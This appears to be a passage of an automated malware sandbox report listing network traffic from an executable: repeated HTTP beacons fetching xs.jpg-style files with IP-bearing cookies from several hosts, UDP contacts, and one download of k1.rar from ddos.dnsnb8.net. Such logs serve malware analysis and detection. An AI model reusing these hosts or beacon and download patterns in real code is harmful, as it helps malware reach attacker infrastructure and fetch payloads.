        Source: global trafficHTTP traffic detected: GET /xs.jpg?35cb7c96=435346908 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?5428f9c6=-1471024244 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9c274079=2103526465 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159432|1720159259|4|43|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?e50bb34e=-227213044 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159432|1720159259|4|43|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?78f5da0c=2029378060 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159433|1720159260|4|43|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?d6d21078=-2072628888 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?91c553b8=1192578784 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?3cded4aa=-1441279834 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159436|1720159259|4|44|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?62886082=-988757756 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159437|1720159259|4|44|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?f69d2558=-472420344 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159437|1720159260|4|44|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?a4a56c66=-1532662682 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?832f1280=-1987233920 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?54daef13=-24064711 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159441|1720159259|4|45|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?99af4b5=1289201064 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159441|1720159259|4|45|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?da885230=-1257200544 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159442|1720159260|4|45|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?a9f1e262=1407435972 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?5829e9af=-1051767432 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?25df21c8=788074048 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159445|1720159259|4|46|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?327e2a9f=-118642122 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159446|1720159259|4|46|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?22eaebd4=-1365861596 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159447|1720159260|4|46|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?7dfe147e=-67360516 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?6f42bef3=181614757 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?80947de5=58389342 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159450|1720159259|4|47|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?48dbc808=-1850241008 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159450|1720159259|4|47|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?2c73ccc=186446640 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159451|1720159260|4|47|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?5a80b326=-737830608 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?626616cd=-335646207 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?f260cef5=-685609761 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159454|1720159259|4|48|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?216d3e73=-930122062 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159454|1720159259|4|48|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9e2ac5aa=2024478376 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159455|1720159260|4|48|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?ef46a9a2=-1402908630 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?37f8d56f=1339359386 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?939b7bae=155214274 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159458|1720159259|4|49|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?67316d6f=898910285 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159459|1720159259|4|49|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?baebcf66=1295391228 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159459|1720159260|4|49|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?6582b518=-1852285480 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1b99da6=86825202 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9055f4a9=-1873414999 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159463|1720159259|4|50|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?dbb63107=-575567816 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159463|1720159259|4|50|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?c7d4d608=1993464376 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159464|1720159260|4|50|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?787713d7=1515414323 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?8a282b2c=-954651084 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?b3df36a1=1740533058 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159467|1720159259|4|51|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?a62d3528=-1506986712 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159467|1720159259|4|51|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?5f87de0d=2115991604 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159468|1720159260|4|51|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?baaa592=1761595938 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?a5242bcc=-834303444 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9ad6cfae=1905085726 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159471|1720159259|4|52|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?9f1f7a44=-1743041436 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159472|1720159259|4|52|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?ea3b604f=-1460829892 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159472|1720159260|4|52|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?3fc8f944=1041285988 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?e4bc5c05=1550460958 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?5eb9eca6=-1116481204 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159476|1720159259|4|53|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?35f32514=1810254376 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159476|1720159259|4|53|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?741b0543=1947927875 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159477|1720159260|4|53|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?f3a2ce17=-2074342170 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?a8241ece=-1855376372 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?91387e43=-1405817186 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159481|1720159259|4|54|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?2322230a=-1347768526 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159481|1720159259|4|54|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?5e41367=98833255 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159482|1720159260|4|54|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?8effb8fc=117276892 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1964acc0=1278084672 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?d090ea93=-795809133 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159485|1720159259|4|55|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?9ba60573=343684734 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159485|1720159259|4|55|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?fc675e35=-120669078 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159486|1720159260|4|55|0; snkz=8.46.123.33
        Source: unknown UDP traffic detected without corresponding DNS query: 85.17.167.196
        Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_0043E810 ioctlsocket,recvfrom, 6_2_0043E810
        Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1e16c26e=-1770927066 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159318|1720159259|3|16|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?1ec6b77a=-1713269406 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159319|1720159259|3|16|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1fd1e84b=533850187 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159319|1720159260|3|16|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?20c162b1=-1547244171 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?211be604=-406631908 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
